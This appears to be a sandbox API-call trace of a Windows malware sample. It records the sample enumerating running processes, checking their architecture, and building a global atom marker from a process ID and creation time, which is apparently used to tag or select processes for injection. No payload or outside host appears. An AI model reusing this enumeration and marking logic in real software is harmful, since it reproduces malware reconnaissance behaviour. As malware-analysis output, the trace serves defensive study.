	[0143.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0143.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.843] CloseHandle (hObject=0x2dc) returned 1
	[0143.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0143.843] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.843] CloseHandle (hObject=0x2dc) returned 1
	[0143.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.844] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.844] CloseHandle (hObject=0x2dc) returned 1
	[0143.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0143.844] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.844] CloseHandle (hObject=0x2dc) returned 1
	[0143.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0143.845] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.845] CloseHandle (hObject=0x2dc) returned 1
	[0143.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.845] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.845] CloseHandle (hObject=0x2dc) returned 1
	[0143.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.846] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.846] CloseHandle (hObject=0x2dc) returned 1
	[0143.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0143.846] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.846] CloseHandle (hObject=0x2dc) returned 1
	[0143.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0143.847] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.847] CloseHandle (hObject=0x2dc) returned 1
	[0143.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0143.847] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.847] CloseHandle (hObject=0x2dc) returned 1
	[0143.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0143.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.848] CloseHandle (hObject=0x2dc) returned 1
	[0143.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0143.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.848] CloseHandle (hObject=0x2dc) returned 1
	[0143.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.848] GetLastError () returned 0x5
	[0143.848] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.849] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.850] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.850] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.850] GetLastError () returned 0x5
	[0143.851] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.851] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetLastError () returned 0x5
	[0143.852] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.853] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.853] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.853] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.853] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.853] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.853] CloseHandle (hObject=0x2dc) returned 1
	[0143.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0143.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.854] CloseHandle (hObject=0x2dc) returned 1
	[0143.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0143.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.854] CloseHandle (hObject=0x2dc) returned 1
	[0143.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0143.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.855] CloseHandle (hObject=0x2dc) returned 1
	[0143.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0143.855] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.855] CloseHandle (hObject=0x2dc) returned 1
	[0143.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0143.855] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.855] CloseHandle (hObject=0x2dc) returned 1
	[0143.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0144.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c38) returned 0xc0000004
	[0144.830] VirtualAlloc (lpAddress=0x0, dwSize=0x16d38, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0144.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d38, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0144.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0144.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0144.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0144.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0144.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0144.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0144.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0144.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0144.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.836] CloseHandle (hObject=0x2dc) returned 1
	[0144.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0144.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0144.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.837] CloseHandle (hObject=0x2dc) returned 1
	[0144.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0144.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.838] CloseHandle (hObject=0x2dc) returned 1
	[0144.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0144.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.838] CloseHandle (hObject=0x2dc) returned 1
	[0144.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0144.838] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.838] CloseHandle (hObject=0x2dc) returned 1
	[0144.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0144.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.839] CloseHandle (hObject=0x2dc) returned 1
	[0144.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0144.839] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.839] CloseHandle (hObject=0x2dc) returned 1
	[0144.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0144.840] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.840] CloseHandle (hObject=0x2dc) returned 1
	[0144.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0144.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0144.841] CloseHandle (hObject=0x2dc) returned 1
	[0144.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0144.841] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
